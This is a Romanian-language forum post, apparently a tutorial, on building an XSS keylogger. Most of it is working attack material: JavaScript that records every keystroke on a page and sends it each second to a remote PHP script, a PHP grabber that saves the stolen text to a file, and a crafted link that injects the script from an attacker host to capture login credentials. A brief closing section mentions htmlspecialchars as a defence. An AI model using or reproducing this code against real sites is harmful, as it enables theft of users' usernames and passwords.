Sari la conținut

[Tutorial] xss Keylogger


KRANOS

Postări Recomandate

Introductie
XSS este una din cele mai intalnite vulnerabilitati web, atacurile XSS sunt de obicei ignorate de administratorii care nu stiu in cat de multe moduri se poate exploata aceasta vulnerabilitate.
In acest tutorial va voi explica cum sa faceti un keylogger pe un site vulnerabil.
In cele mai multe cazuri, atacatorul fura cookieul victimei pentru ii accesa contul fara un username sau o parola.
Acum imaginati-va ca atacatorul are nevoie sa faca rost de usernameul sau parola victimei, pentru cauze ce nu trebuie explicate, in acest caz trebuie capturata fiecare tasta ce a fost scrisa pe pagina de login.
Javascript Keylogger
Codul de mai jos este un keylogger Javascript, el captureaza toate cuvintele scrise pe o pagina si le trimite remote unui script PHP odata la cateva secunde.
Schimbati localhost cu cu hostnameul serverului si locatia specifica.

 

var keys='';
document.onkeypress = function(e) {
    get = window.event?event:e;
    key = get.keyCode?get.keyCode:get.charCode;
    key = String.fromCharCode(key);
    keys+=key;
}
window.setInterval(function(){
    new Image().src = 'http://localhost/dem...ylogger.php?c='+keys;
    keys = '';
}, 1000);
PHP Grabber
Codul de mai jos va primi si salva toate datele trimise de catre keylogger.
<?php
if(!empty($_GET['c'])) {
    $logfile = fopen('data.txt', 'a+');
    fwrite($logfile, $_GET['c']);
    fclose($logfile);
}

?> Exploatare

 

Acum atacatorul are ambele fisiere keylogger.php si keylogger.js pe un remote host.
El va trebui sa creeze un link infectat, precum acesta:
http://target/path/v...rticle=9<script src="http://attacker/keyl...r.js"></script>
Atacatorul poate trimite linkurile ca acesta victimei, daca victima nu observa URI-ul ciudat si se logheaza cu usernameul si parola, datele vor fi salvate in fisierul 'data.txt' pe serverul remote al atacatorului.
Protejare
Exista mai multe solutii pentru a fixa un cod vulnerabil la XSS.
Folositi-va de functia PHP htmlspecialchars(), care previne folosirea de caractere precum < ' / etc , transformandu-le in coduri html nefolositoare.
Nu trimiteti direct niciodata o variabila GET/POST/COOKIE, prin care atacatorul poate injecta coduri in pagina.
Asta a fost tot legat de subiectul xss keylogging, multumesc pentru ca ati citit.

Link spre comentariu
Distribuie pe alte site-uri

Vizitator
Acest topic este acum închis pentru alte răspunsuri.
×
×
  • Creează nouă...

Informații Importante

Am plasat cookie-uri pe dispozitivul tău pentru a îmbunătății navigarea pe acest site. Poți modifica setările cookie, altfel considerăm că ești de acord să continui. Also by continuing using this website you agree with the Terms of Use and Privacy Policy.